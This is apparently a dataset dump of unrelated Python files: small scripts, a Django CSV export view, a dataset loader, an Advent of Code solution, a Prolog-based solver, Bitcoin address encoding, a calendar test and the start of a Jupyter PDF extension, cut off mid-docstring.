content stringlengths 5 1.05M |
|---|
"""
Leia uma frase qualquer e diga se ela é um palíndromo
UMA FORMA SEM O FOR
inverso = junto[::-1]
"""
frase = str(input('Digite uma frase qualquer: ')).strip()
div = frase.split()
junto = ''.join(div) # junção das palavras
inverso = ''
for letra in range(len(junto) - 1, -1, -1):
inverso += junto[letra]
if inverso == junto:
print("É um palíndromo")
else:
print('Não é um palíndromo') |
from django.http import HttpResponse
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.auth import get_user_model
from django.utils import formats
import csv
import itertools
User = get_user_model()
def csv_out(qs, headers, row_export_func, file_name='export'):
    """Export a queryset as a downloadable CSV response.

    :param qs: queryset to output
    :param headers: list of CSV headers
    :param row_export_func: returns a list of data attrs to export per object/qdict
    :param file_name: a filename this CSV will download as
    :return: a response with CSV data that will save as a download
    """
    response = HttpResponse(content_type='text/csv')
    response['Content-Disposition'] = f'attachment; filename="{file_name}.csv"'
    writer = csv.writer(response)
    writer.writerow(headers)
    # stream rows straight from the queryset iterator into the writer
    writer.writerows(row_export_func(obj) for obj in qs.iterator())
    return response
def export_emails(filters, file_name='export-email'):
    """Export basic profile fields of users matching ``filters`` as a CSV download."""
    queryset = User.objects.filter(**filters).order_by('-id')
    columns = ['User ID', 'Date joined',
               'Email Address', 'First Name', 'Last Name']

    def to_row(user):
        # one CSV row per user, with the join date rendered in Django's short format
        joined = formats.date_format(user.date_joined, "SHORT_DATETIME_FORMAT")
        return [user.id, joined, user.email, user.first_name, user.last_name]

    return csv_out(queryset, columns, to_row, file_name=file_name)
@staff_member_required
def email_export(request, filters=None):
    """Staff-only view that downloads matching users' emails as a CSV.

    ``filters`` previously defaulted to a shared mutable dict (``{}``); a
    ``None`` sentinel avoids accidental cross-request mutation of the default.
    """
    return export_emails(filters if filters is not None else {})
|
import csv
import gzip
from pathlib import Path
from rich.console import Console
from typing import Union, List, Iterator
SENTIMENT_CLASS_VALUES = ['POSITIVE', 'NEGATIVE']
PRODUCT_CATEGORIES = ['Kitchen', 'DVD', 'Books', 'Electronics']
CORPUS_SIZE = 5600
console = Console()
__general_download_message__ = """Ensure that you have properly downloaded categorized product sentiment corpus using
python -m sadedegel.dataset.tweet_sentiment download --access-key xxx --secret-key xxxx
Unfortunately due to data licensing issues we could not share data publicly.
Get in touch with sadedegel team to obtain a download key.
"""
def check_directory_structure(path: str) -> bool:
    """Return True when the corpus directory layout exists under ``path``.

    On a missing base directory or corpus subdirectory, logs a rich-formatted
    error plus the download instructions and returns False.
    """
    base_dir = Path(path).expanduser()
    cat_prod_sentiment_dir = base_dir / 'categorized_product_sentiment'
    if base_dir.exists() and cat_prod_sentiment_dir.exists():
        return True
    # report whichever level of the layout is missing
    if not base_dir.exists():
        console.log(f"Dataset base directory ([bold red]{base_dir}[/bold red]) does not exist")
    else:
        console.log(
            f"Tweet sentiment directory ([bold red]{cat_prod_sentiment_dir}[/bold red]) does not exist")
    console.log(__general_download_message__)
    return False
def load_categorized_product_sentiment_train(data_home="~/.sadedegel_data",
                                             categories: Union[None, List[str], str] = None) -> Iterator[dict]:
    """Yield training records of the categorized product sentiment corpus.

    @param data_home: Sadedegel data directory base. Default to be ~/.sadedegel_data
    @param categories:
        If None (default), load all the categories.
        If not None, list of category names (or a single category) to load (other categories
        ignored).
    @return: Iterator of dictionaries with keys ``id``, ``text``,
        ``product_category`` (index into PRODUCT_CATEGORIES) and
        ``sentiment_class`` (index into SENTIMENT_CLASS_VALUES).
    """
    if not check_directory_structure(data_home):
        raise Exception("Categorized Product Corpus validation error")
    train_csv = (Path(data_home).expanduser() / "categorized_product_sentiment"
                 / "categorized_product_sentiment.csv.gz")
    # normalise the categories argument into a list of category names
    if categories is None:
        filtered_categories = PRODUCT_CATEGORIES
    elif isinstance(categories, str):
        filtered_categories = [categories]
    elif isinstance(categories, list):
        filtered_categories = categories
    else:
        raise ValueError(f"categories of type {type(categories)} is invalid.")
    with gzip.open(train_csv, "rt") as csvfile:
        rd = csv.DictReader(csvfile)
        for rec in rd:
            # filter before building the record dict (it was previously built
            # unconditionally for every row, including skipped ones)
            if rec['category'] not in filtered_categories:
                continue
            yield dict(id=rec['text_uuid'], text=rec['text'],
                       product_category=PRODUCT_CATEGORIES.index(rec['category']),
                       sentiment_class=SENTIMENT_CLASS_VALUES.index(rec['sentiment_class']))
|
# ---------------------------------------------------------------------------------------------------------------------
# AoC 2021
# ---------------------------------------------------------------------------------------------------------------------
# 18.py
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------------------------------------------------
import math
# ---------------------------------------------------------------------------------------------------------------------
def add(x: str, y: str) -> str:
    """Snailfish addition: wrap the two number strings in a new outer pair."""
    return f"[{x},{y}]"
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
def reduce_explode_left(s: str, sl: int) -> str:
    """Add ``sl`` to the rightmost number of ``s`` (the part left of an exploded pair).

    Returns ``s`` unchanged when it contains no digits. The previous version
    indexed ``s_left[-1]`` without a bounds check while consuming digits, which
    raised IndexError when the string consisted entirely of digits.
    """
    # scan right-to-left for the last digit
    end = len(s) - 1
    while end >= 0 and not s[end].isdigit():
        end -= 1
    if end < 0:
        return s  # no number to the left to add into
    # expand leftwards over the whole (possibly multi-digit) number
    start = end
    while start >= 0 and s[start].isdigit():
        start -= 1
    bumped = int(s[start + 1:end + 1]) + sl
    return s[:start + 1] + str(bumped) + s[end + 1:]
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
def reduce_explode_right(s: str, sr: int) -> str:
    """Add ``sr`` to the leftmost number of ``s`` (the part right of an exploded pair).

    Returns ``s`` unchanged when it contains no digits. The previous version
    indexed ``s_right[0]`` without a bounds check while consuming digits, which
    raised IndexError when the number ran to the end of the string.
    """
    n = len(s)
    # scan left-to-right for the first digit
    start = 0
    while start < n and not s[start].isdigit():
        start += 1
    if start == n:
        return s  # no number to the right to add into
    # expand rightwards over the whole (possibly multi-digit) number
    end = start
    while end < n and s[end].isdigit():
        end += 1
    bumped = int(s[start:end]) + sr
    return s[:start] + str(bumped) + s[end:]
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
def reduce_explode(s: str) -> str:
    """Perform the first (leftmost) explode action on ``s``, if any.

    A pair nested inside four other pairs (nesting depth 5) explodes: its left
    value is added to the nearest number on its left, its right value to the
    nearest number on its right, and the pair itself becomes ``0``.
    Returns ``s`` unchanged when nothing explodes.
    NOTE(review): assumes an exploding pair always contains two plain numbers
    ("[l,r]"), which holds for valid puzzle input -- confirm for other uses.
    """
    s_left, s_mid, s_right = "", "", ""
    num_opened, num_closed = 0, 0
    for i in range(len(s)):
        c = s[i]
        if c == '[':
            num_opened += 1
        elif c == ']':
            num_closed += 1
        # num_opened - num_closed is the current bracket nesting depth
        if num_opened - num_closed < 5:
            if s_mid == "":
                # still searching for a depth-5 pair: accumulate the prefix
                s_left += c
            else:
                # s_mid now holds a complete "[l,r]" pair: explode it and return
                s_mid += c
                s_right = s[i + 1:]
                sl, sr = [int(t) for t in s_mid[1: -1].split(',')]
                s_left = reduce_explode_left(s_left, sl)
                s_right = reduce_explode_right(s_right, sr)
                return s_left + "0" + s_right
        if num_opened - num_closed == 5:
            # inside the exploding pair: collect its text
            s_mid += c
    return s
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
def reduce_split(s: str) -> str:
    """Perform the first (leftmost) split action on ``s``, if any.

    The first number >= 10 becomes a pair ``[floor(n/2), ceil(n/2)]``.
    Returns ``s`` unchanged when no number needs splitting. The previous
    version scanned digits with unchecked indexing (``s[i]``/``s[j]``), which
    raised IndexError on strings ending in a digit.
    """
    i = 0
    n = len(s)
    while i < n:
        if not s[i].isdigit():
            i += 1
            continue
        # consume the whole number starting at i, bounds-checked
        j = i + 1
        while j < n and s[j].isdigit():
            j += 1
        sd = int(s[i:j])
        if sd >= 10:
            # left half rounds down, right half rounds up
            return s[:i] + "[%d,%d]" % (sd // 2, (sd + 1) // 2) + s[j:]
        i = j  # number was small; keep scanning after it
    return s
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
def reduce(s0: str) -> str:
    """Fully reduce a snailfish number: explode whenever possible, else split."""
    current = s0
    while True:
        exploded = reduce_explode(current)
        if exploded != current:
            # an explode happened; explodes always take priority over splits
            current = exploded
            continue
        after_split = reduce_split(current)
        if after_split == current:
            # neither action changed the string: fixed point reached
            return current
        current = after_split
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
def magnitude(s: str) -> int:
    """Recursively compute 3*magnitude(left) + 2*magnitude(right) for the pair in ``s``."""
    depth = 1  # we start just inside the opening '['
    for idx in range(1, len(s)):
        ch = s[idx]
        if ch == '[':
            depth += 1
        elif ch == ']':
            depth -= 1
        elif ch == ',' and depth == 1:
            # top-level comma: split the string into the pair's two halves
            left, right = s[1:idx], s[idx + 1:-1]
            left_val = magnitude(left) if ',' in left else int(left)
            right_val = magnitude(right) if ',' in right else int(right)
            return 3 * left_val + 2 * right_val
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
def main() -> None:
    """Solve AoC 2021 day 18.

    Part 1: fold the input list with snailfish addition (reducing after each
    add) and print the magnitude of the total.
    Part 2: print the largest magnitude obtainable from any ordered pair of
    distinct input numbers (snailfish addition is not commutative).
    """
    with open('input.txt') as f:
        numbers = [t.strip() for t in f.readlines()]
    # part 1: left-fold the list with add + reduce
    s = ""
    for n in numbers:
        if not s:
            s = n
        else:
            s = reduce(add(s, n))
            # print("after addition: %s" % s)
    print("part 1: %s" % magnitude(s))
    # part 2: try every ordered pair i != j
    m_max = 0
    for i in range(len(numbers)):
        for j in range(len(numbers)):
            if i == j:
                continue
            s = reduce(add(numbers[i], numbers[j]))
            s = reduce(s)  # second reduce is a no-op: reduce already returns a fixed point
            m = magnitude(s)
            if m > m_max:
                m_max = m
    print("part 2: %d" % m_max)
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
# Run only when executed as a script, not on import.
if __name__ == '__main__':
    main()
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
# End of File
# ---------------------------------------------------------------------------------------------------------------------
|
'''
Created on 2015-01-16
@author: levi
'''
from pyswip import Prolog
from attribute_equation_solver import AttributeEquationSolver
class PrologAttributeEquationEvaluator(AttributeEquationSolver):
"""
Simple constraint solver based on prolog for string equations in path conditions.
Requires pyswip, a bridge between python and prolog to be installed.
For information on how to install pyswip see: https://code.google.com/p/pyswip/
"""
# to generate fresh var ID names
varID = 0
# Keep the variable names in the prolog expression for all attributes of the same
# name connected to the same object. This is necessary because an object may have connected
# to it more than one attribute with the same name, which means the attribute has multiple
# constraints for that object.
varNameDatabase = {}
def __init__(self, verbosity):
self.verbosity = verbosity
def newVarID(self):
old_varID = self.varID
self.varID += 1
return "V" + str(old_varID)
# def build_equation_expression(self, node, pathCondition, variablesInExpression, concatsInExpression):
# """
# helper for building the attribute equations by recursively going through the operations associated
# to the left hand side and to the right hand side of an equation
# """
#
# # in case it's an attribute, return the object's ID
# if pathCondition.vs[node]['mm__'] == 'Attribute':
# variablesInExpression.append("X" + str(node))
# return "X" + str(node)
# # in case it's a constant, return its value as a list
# elif pathCondition.vs[node]['mm__'] == 'Constant':
# constant = pathCondition.vs[node]['name']
# print "------> " + constant
# constAsList = "["
# for c in range(0,len(constant)):
# constAsList += "'" + constant[c] + "'"
# if c < len(constant) - 1:
# constAsList += ","
# constAsList += "]"
# return constAsList
# # it's a concat operation
# else:
# # get the arguments of the concat operation
# arg1Edge = [i for i in pathCondition.neighbors(node,1) if pathCondition.vs[i]['mm__'] == 'hasArgs'][0]
# arg2Edge = [i for i in pathCondition.neighbors(node,1) if pathCondition.vs[i]['mm__'] == 'hasArgs'][0]
# arg1 = pathCondition.neighbors(arg1Edge,1)[0]
# arg2 = pathCondition.neighbors(arg2Edge,1)[0]
# newVar = self.newVarID()
#
# # add the concat operation to the set of append predicates in the body of the rule
# concatsInExpression.append("append(" + self.build_equation_expression(arg1, pathCondition, variablesInExpression, concatsInExpression) + "," + self.build_equation_expression(arg2, pathCondition, variablesInExpression, concatsInExpression) + "," + newVar + ")")
#
# # return the newly created variable
# return newVar
# def __call__(self, pathCondition):
# """
# Evaluates attribute equations by producing a Prolog predicate out of them and attempting to find a solution for that predicate.
# The predicate has as arguments the attributes of the path condition for which a solution needs to exist such that the path condition is possible.
# If a solution is found then the evaluator returns true, otherwise false.
# """
#
# clauseBody = ""
# variablesInExpression = []
# concatsInExpression = []
#
# # grab all the equation nodes in the path condition
# equationNodes = self._find_nodes_with_mm(pathCondition, "Equation")
# # now build all the equations
# if equationNodes != []:
# for equationNode in range(0,len(equationNodes)):
# # get the left and the right expressions of the equation
# leftExprEdge = [i for i in pathCondition.neighbors(equationNodes[equationNode],1) if pathCondition.vs[i]['mm__'] == 'leftExpr'][0]
# rightExprEdge = [i for i in pathCondition.neighbors(equationNodes[equationNode],1) if pathCondition.vs[i]['mm__'] == 'rightExpr'][0]
#
# leftExprNode = pathCondition.neighbors(leftExprEdge,1)[0]
# rightExprNode = pathCondition.neighbors(rightExprEdge,1)[0]
#
# leftExpr = self.build_equation_expression(leftExprNode, pathCondition, variablesInExpression, concatsInExpression)
# rightExpr = self.build_equation_expression(rightExprNode, pathCondition, variablesInExpression, concatsInExpression)
#
# if equationNode < len(equationNodes)-1:
# clauseBody += leftExpr + "=" + rightExpr + ","
# else:
# clauseBody += leftExpr + "=" + rightExpr
#
# if concatsInExpression != []:
# clauseBody += ","
# for concat in concatsInExpression:
# clauseBody += concat
#
# clauseHead = "solve("
# # variablesInExpression = list(set(variablesInExpression))
# for var in range(0,len(variablesInExpression)):
# if var < len(variablesInExpression)-1:
# clauseHead += variablesInExpression[var] + ","
# else:
# clauseHead += variablesInExpression[var]
# clauseHead += ")"
#
# prologInput = clauseHead + ":-" + clauseBody
#
# if self.verbosity >= 2 :
# print "\nChecking with Prolog:"
# print "----------------"
# print prologInput
# print "\n"
#
# p = Prolog()
# p.assertz(prologInput)
# # l = list(p.query(clauseHead))
#
# print "Clause head: " + clauseHead
# result = list(p.query(clauseHead))
# print "Prolog result:"
# print result
#
# if result == []:
# if self.verbosity >= 2 : print "Prolog check failed!"
# return False
# else:
# if self.verbosity >= 2 : print "Prolog check succeeded!"
# return True
def build_equation_expression(self, node, pathCondition, variablesInExpression, concatsInExpression, varParentObjects):
"""
helper for building the attribute equations by recursively going through the operations associated
to the left hand side and to the right hand side of an equation
"""
# in case it's an attribute, return the object's ID
if pathCondition.vs[node]['mm__'] == 'Attribute':
# get the parent object of the attribute
attrEdgeMatch = [i for i in pathCondition.neighbors(node,2) if pathCondition.vs[i]['mm__'] == 'hasAttribute_S']
attrEdgeApply = [i for i in pathCondition.neighbors(node,2) if pathCondition.vs[i]['mm__'] == 'hasAttribute_T']
if attrEdgeMatch != []:
parentObject = pathCondition.neighbors(attrEdgeMatch[0],2)[0]
else:
parentObject = pathCondition.neighbors(attrEdgeApply[0],2)[0]
# check if a variable for an attribute having the same name and belonging to the same object has already been created
# and in case it has just return it, otherwise create a new variable
attrName = pathCondition.vs[node]['name']
varDatabaseKey = str(parentObject) + attrName
if not varDatabaseKey in set(self.varNameDatabase.keys()):
self.varNameDatabase[varDatabaseKey] = "X" + str(node)
variablesInExpression.append(self.varNameDatabase[varDatabaseKey])
return self.varNameDatabase[varDatabaseKey]
else:
variablesInExpression.append(self.varNameDatabase[varDatabaseKey])
return self.varNameDatabase[varDatabaseKey]
# in case it's a constant, return its value as a list
elif pathCondition.vs[node]['mm__'] == 'Constant':
constant = pathCondition.vs[node]['name']
constAsList = "["
for c in range(0,len(constant)):
constAsList += "'" + constant[c] + "'"
if c < len(constant) - 1:
constAsList += ","
constAsList += "]"
return constAsList
# it's a concat operation
else:
# get the arguments of the concat operation
arg1Edge = [i for i in pathCondition.neighbors(node,1) if pathCondition.vs[i]['mm__'] == 'hasArgs'][0]
arg2Edge = [i for i in pathCondition.neighbors(node,1) if pathCondition.vs[i]['mm__'] == 'hasArgs'][1]
arg1 = pathCondition.neighbors(arg1Edge,1)[0]
arg2 = pathCondition.neighbors(arg2Edge,1)[0]
newVar = self.newVarID()
# add the concat operation to the set of append predicates in the body of the rule
concatsInExpression.append("append(" + self.build_equation_expression(arg1, pathCondition, variablesInExpression, concatsInExpression, varParentObjects) + "," + self.build_equation_expression(arg2, pathCondition, variablesInExpression, concatsInExpression, varParentObjects) + "," + newVar + ")")
# return the newly created variable
return newVar
def __call__(self, pathCondition):
"""
Evaluates attribute equations by producing a Prolog predicate out of them and attempting to find a solution for that predicate.
The predicate has as arguments the attributes of the path condition for which a solution needs to exist such that the path condition is possible.
If a solution is found then the evaluator returns true, otherwise false.
"""
clauseBody = ""
variablesInExpression = []
concatsInExpression = []
varParentObjects = []
# grab all the equation nodes in the path condition
equationNodes = self._find_nodes_with_mm(pathCondition, "Equation")
# now build all the equations
if equationNodes != []:
for equationNode in range(0,len(equationNodes)):
# get the left and the right expressions of the equation
leftExprEdge = [i for i in pathCondition.neighbors(equationNodes[equationNode],1) if pathCondition.vs[i]['mm__'] == 'leftExpr'][0]
rightExprEdge = [i for i in pathCondition.neighbors(equationNodes[equationNode],1) if pathCondition.vs[i]['mm__'] == 'rightExpr'][0]
leftExprNode = pathCondition.neighbors(leftExprEdge,1)[0]
rightExprNode = pathCondition.neighbors(rightExprEdge,1)[0]
leftExpr = self.build_equation_expression(leftExprNode, pathCondition, variablesInExpression, concatsInExpression, varParentObjects)
rightExpr = self.build_equation_expression(rightExprNode, pathCondition, variablesInExpression, concatsInExpression, varParentObjects)
if equationNode < len(equationNodes)-1:
clauseBody += leftExpr + "=" + rightExpr + ","
else:
clauseBody += leftExpr + "=" + rightExpr
for concat in concatsInExpression:
clauseBody += ","
clauseBody += concat
clauseHead = "solve("
# variablesInExpression = list(set(variablesInExpression))
for var in range(0,len(variablesInExpression)):
if var < len(variablesInExpression)-1:
clauseHead += variablesInExpression[var] + ","
else:
clauseHead += variablesInExpression[var]
clauseHead += ")"
prologInput = clauseHead + ":-" + clauseBody
if self.verbosity >= 2 :
print "\nChecking with Prolog:"
print "----------------"
print prologInput
print "\n"
p = Prolog()
p.assertz(prologInput)
# l = list(p.query(clauseHead))
if self.verbosity >= 2 :
print "Clause head: " + clauseHead
result = list(p.query(clauseHead))
print "Prolog result: " + str(result)
if result == []:
if self.verbosity >= 2 : print "Prolog check failed!"
return False
else:
if self.verbosity >= 2 : print "Prolog check succeeded!"
return True
def _find_nodes_with_mm(self, graph, mm_names):
"""
Find all objects of a given type in a rules having theur type name in the mm_names set.
TODO: move this method to the himesis_utils file, together with the one from PyRamify
"""
nodes = []
for node in graph.vs:
if node["mm__"] in mm_names:
nodes.append(node)
return nodes
|
import hashlib
import sys
# 58 character alphabet used
BASE58_ALPHABET = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
# code reference url:https://www.cnblogs.com/zhaoweiwei/p/address.html
def from_bytes(data, big_endian=False):
    """Python-2 fallback for ``int.from_bytes``: interpret a byte sequence as an int.

    Bytes are treated as little-endian unless ``big_endian`` is True.
    """
    if isinstance(data, str):
        data = bytearray(data)
    ordered = reversed(data) if big_endian else data
    # accumulate each byte shifted into its little-endian position
    return sum(byte << (8 * offset) for offset, byte in enumerate(ordered))
def base58_encode(version, public_address):
    """
    Gets a Base58Check string
    See https://en.bitcoin.it/wiki/Base58Check_encoding
    """
    # decode the hex version prefix on either python 2 or 3
    if sys.version_info.major > 2:
        version = bytes.fromhex(version)
    else:
        version = bytearray.fromhex(version)
    # checksum = first four bytes of a double SHA-256 over version + address
    double_hash = hashlib.sha256(hashlib.sha256(version + public_address).digest())
    checksum = double_hash.digest()[:4]
    payload = version + public_address + checksum
    if sys.version_info.major > 2:
        result = int.from_bytes(payload, byteorder="big")
    else:
        result = from_bytes(payload, True)
    # each leading zero byte becomes a literal '1' in Base58Check
    padding = len(payload) - len(payload.lstrip(b'\0'))
    digits = []
    while result != 0:
        result, remainder = divmod(result, 58)
        digits.append(BASE58_ALPHABET[remainder])
    return padding * "1" + "".join(reversed(digits))
def get_public_address(public_key):
    """Return HASH160(public_key): RIPEMD-160 of the SHA-256 of the key bytes."""
    sha_digest = hashlib.sha256(public_key).digest()
    ripemd = hashlib.new('ripemd160')  # NOTE: requires an OpenSSL build with ripemd160 enabled
    ripemd.update(sha_digest)
    return ripemd.digest()
def script_asm_to_non_standard_address(script_asm):
    """Derive a bitcoin address from a script's asm string.

    Treats the first whitespace-separated token of ``script_asm`` as a hex
    public key, hashes it (SHA-256 then RIPEMD-160) and Base58Check-encodes
    the result with version byte 0x00.
    (A dead, triple-quoted alternative implementation that hashed the raw
    script bytes was removed.)
    """
    # public key to bitcoin address
    public_key = bytearray.fromhex(script_asm.split(" ")[0])
    public_address = get_public_address(public_key)
    return base58_encode("00", public_address)
|
# Copyright 2018-2020 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""
This module contains optimizers for the standard :mod:`QNode` class, which uses the NumPy interface.
"""
# Python optimizers that are available in PennyLane
# listed in alphabetical order to avoid circular imports
from .adagrad import AdagradOptimizer
from .adam import AdamOptimizer
from .gradient_descent import GradientDescentOptimizer
from .momentum import MomentumOptimizer
from .nesterov_momentum import NesterovMomentumOptimizer
from .rms_prop import RMSPropOptimizer
from .qng import QNGOptimizer
from .rotosolve import RotosolveOptimizer
from .rotoselect import RotoselectOptimizer
# Optimizers to display in the docs; this is also the public API of the
# subpackage (controls `from pennylane.optimize import *`).
__all__ = [
    "AdagradOptimizer",
    "AdamOptimizer",
    "GradientDescentOptimizer",
    "MomentumOptimizer",
    "NesterovMomentumOptimizer",
    "RMSPropOptimizer",
    "QNGOptimizer",
    "RotosolveOptimizer",
    "RotoselectOptimizer",
]
|
import re

# A backreference (\1) must match the exact text captured by group 1, so this
# pattern matches a token, a space, then the same token again.
pattern = r"(.+) \1"
"""Note that "(.+) \1" is not the same as "(.+) (.+)": \1 refers to the text
actually matched by the first group -- the same characters must appear again --
not to the group's regex pattern."""
match = re.match(pattern, "word word")  # group 1 = "word", repeated -> match
if match:
    print("Match 1")
    print(match.group(1))  # the captured group
    print(match.group())   # the whole match
match = re.match(pattern, "?! ?!")  # '.' also matches punctuation -> match
if match:
    print("Match 2")
    print(match.group(1))
    print(match.group())
match = re.match(pattern, "abc cde")  # "abc" != "cde" -> no match
if match:
    print("Match 3")
    print(match.group(1))
    print(match.group())

# \1 must repeat the FIRST group ("abc" here), so only "... abc" matches.
pattern = r"(.+) (.+) (.+) \1"
match = re.match(pattern, "abc bca cab abc")  # \1 represent abc
if match:
    print("Match 1-1")
match = re.match(pattern, "abc bca cab bca")
if match:
    print("Match 1-2")
match = re.match(pattern, "abc bca cab cab")
if match:
    print("Match 1-3")

# \2 must repeat the SECOND group ("bca" here).
pattern = r"(.+) (.+) (.+) \2"
match = re.match(pattern, "abc bca cab abc")
if match:
    print("Match 2-1")
match = re.match(pattern, "abc bca cab bca")  # \2 represent bca
if match:
    print("Match 2-2")
match = re.match(pattern, "abc bca cab cab")
if match:
    print("Match 2-3")

# \3 must repeat the THIRD group ("cab" here).
pattern = r"(.+) (.+) (.+) \3"
match = re.match(pattern, "abc bca cab abc")
if match:
    print("Match 3-1")
match = re.match(pattern, "abc bca cab bca")
if match:
    print("Match 3-2")
match = re.match(pattern, "abc bca cab cab")  # \3 represent cab
if match:
    print("Match 3-3")
|
from unittest import TestCase
import pandas as pd
from exchange_calendars.extensions.exchange_calendar_krx import KRXExchangeCalendar
class KRXCalendarTestCase(TestCase):
    # Maximum trading hours in a single KRX session.
    MAX_SESSION_HOURS = 8.5

    def test_2017_holidays(self):
        """Every 2017 KRX market holiday must not be a trading session."""
        # lunar new years: jan 27, 30 / independence day: mar 1 / labor day: may 1
        # buddha's birthday: may 3 / children's day: may 5 / president: may 9
        # memorial day: jun 6 / liberation day: aug 15 / substitution holiday: oct 2
        # harvest moon days: oct 3, 4, 5, 6 / hangul proclamation day: oct 9
        # christmas: dec 25 / end year closing: dec 29
        self.calendar = KRXExchangeCalendar()
        holidays = ['2017-01-27', '2017-01-30', '2017-03-01', '2017-05-01', '2017-05-03',
                    '2017-05-05', '2017-05-09', '2017-06-06', '2017-08-15', '2017-10-02',
                    '2017-10-03', '2017-10-04', '2017-10-05', '2017-10-06', '2017-10-09',
                    '2017-12-25', '2017-12-29']
        for holiday in holidays:
            is_open = self.calendar.is_session(pd.Timestamp(holiday, tz='UTC'))
            self.assertFalse(is_open)
|
import media
import fresh_tomatoes

"""Instances consist of 4 arguments each that are passed into the
module media.py and use its class Movie."""

# 6 instances that call the __init__ method in the module media.py
star_wars = media.Movie(
    "Star Wars",
    "A story of a boy a girl and the universe",
    # NOQA - URL breaks PEP8 standards but can't break line to fix
    "https://tse2.mm.bing.net/th?id=OIP.W3-_kiSuMQ35EpfQmpCQoAHaKX&pid=15.1&P=0&w=300&h=300",
    "https://youtube.com/tv#/watch?v=XHk5kCIiGoM")
the_sound_of_music = media.Movie(
    "The Sound of Music",
    # NOQA - URL breaks PEP8 standards but can't break line to fix
    "A Nun, Maria, becomes a Governess and much more for the Von Trapps.",
    "https://tse1.mm.bing.net/th?id=OIP.OGX0qNsyvHh3O7j4JBvJYgHaLD&pid=15.1&P=0&w=300&h=300",
    "https://youtube.com/tv#/watch?v=UY6uw3WpPzY")
transformers = media.Movie(
    "The Transformers: The Movie(1986)",
    "Autobots battle the Decepticons and Unicron",
    "https://i.jeded.com/i/the-transformers-the-movie.31030.jpg",
    "https://youtube.com/tv#/watch?v=VyGLiwGUjeM")
avengers = media.Movie(
    "The Avengers",
    "The Avengers battle Loki.",
    # NOQA - URL breaks PEP8 standards but can't break line to fix
    "http://1.bp.blogspot.com/-p9FPICvPfqo/VdbMbDqbhDI/AAAAAAAAzrU/2BnrpuqkilQ/s1600/AvengersPoster4.jpg",
    "https://youtube.com/tv#/watch?v=eOrNdBpGMv8")
wonder_woman = media.Movie(
    "Wonder Woman",
    "The Amazon searches the world for The God of War",
    "https://hmssweblog.files.wordpress.com/2017/05/wonder-woman-poster.jpg",
    "https://youtube.com/tv#/watch?v=VSB4wGIdDwo")
black_panther = media.Movie(
    "The Black Panther",
    # typo fix: "stryggles" -> "struggles" (user-facing description)
    "Wakanda struggles to use their resources to help the world.",
    # NOQA - URL breaks PEP8 standards but can't break line to fix
    "https://www.monkeysfightingrobots.com/wp-content/uploads/2017/10/Black-Panther-Poster.jpg",
    "https://youtube.com/tv#/watch?v=xjDjIWPwcPU")

# List of all Movie instances, in display order
movies = [
    star_wars,
    the_sound_of_music,
    transformers,
    avengers,
    wonder_woman,
    black_panther]

# Calls the method inside the module fresh_tomatoes and places an argument
# into it
fresh_tomatoes.open_movies_page(movies)
|
# Score saved model predictions: report accuracy on the eval split and write
# the test predictions as a Kaggle submission file.
eval_file = 'pred_eval.txt'
test_file = 'pred_test.txt'
# Gold labels: the first comma-separated field of each eval-data line.
with open("twitter-datasets/eval_data.txt", "r") as f:
    labels = []
    for line in f.readlines():
        labels.append(int(line.strip().split(",")[0]))
# Accuracy: compare the last character of each prediction line (assumed to be
# a single 0/1 digit -- TODO confirm the prediction file format) to the label.
with open(eval_file, "r") as f:
    correct = 0
    total = 0
    for i, line in enumerate(f.readlines()):
        label = int(line.strip()[-1])
        if label == labels[i]:
            correct += 1
        total += 1
    print("Eval acc", correct / float(total))
# Kaggle submission: ids are 1-based; {0,1} predictions map to {-1,+1}.
with open(test_file, 'r') as f:
    with open(test_file + '.kaggle.csv', 'w') as w:
        print('Id,Prediction', file=w)
        for i, line in enumerate(f.readlines()):
            label = 2 * int(line.strip()[-1]) - 1
            print('{},{}'.format(i + 1, label), file=w)
|
"""Define a Jupyter Notebook extension to export Notebooks to PDF.
This module takes the selected Jupyter Notebook files and converts
them to a single PDF.
"""
import os
import io
from typing import List, Dict, TYPE_CHECKING, Union
from notebook.base.handlers import IPythonHandler, web, path_regex, FilesRedirectHandler
from notebook.nbconvert.handlers import _format_regex
from nbconvert import PDFExporter
from notebook.utils import url_path_join
from ipython_genutils import text
from pdfrw import PdfWriter, PdfReader
import thermohw
if TYPE_CHECKING:
from notebook.notebookapp import NotebookWebApplication # noqa: F401 (typing)
from ._version import __version__ # noqa: F401
thermohw_dir: str = os.path.abspath(os.path.dirname(thermohw.__file__))
def _jupyter_server_extension_paths() -> List[Dict[str, str]]:
return [{
"module": "convert_and_download"
}]
# Jupyter Extension points
def _jupyter_nbextension_paths() -> List[Dict[str, str]]:
return [dict(
section="tree",
# the path is relative to the `my_fancy_module` directory
src="static",
# directory in the `nbextension/` namespace
dest="convert_and_download",
# _also_ in the `nbextension/` namespace
require="convert_and_download/main")]
class DLConvertHandler(IPythonHandler):
    """Handle converting and downloading a set of Notebooks to PDF.

    GET /dlconvert/pdf/<paths> converts each requested notebook with
    nbconvert's PDFExporter (configured with thermohw's preprocessor,
    template and filters) and merges the results into one PDF response.
    """

    SUPPORTED_METHODS = ('GET',)

    @web.authenticated
    def get(self, format: str, path: str):
        """Handle the GET method call.

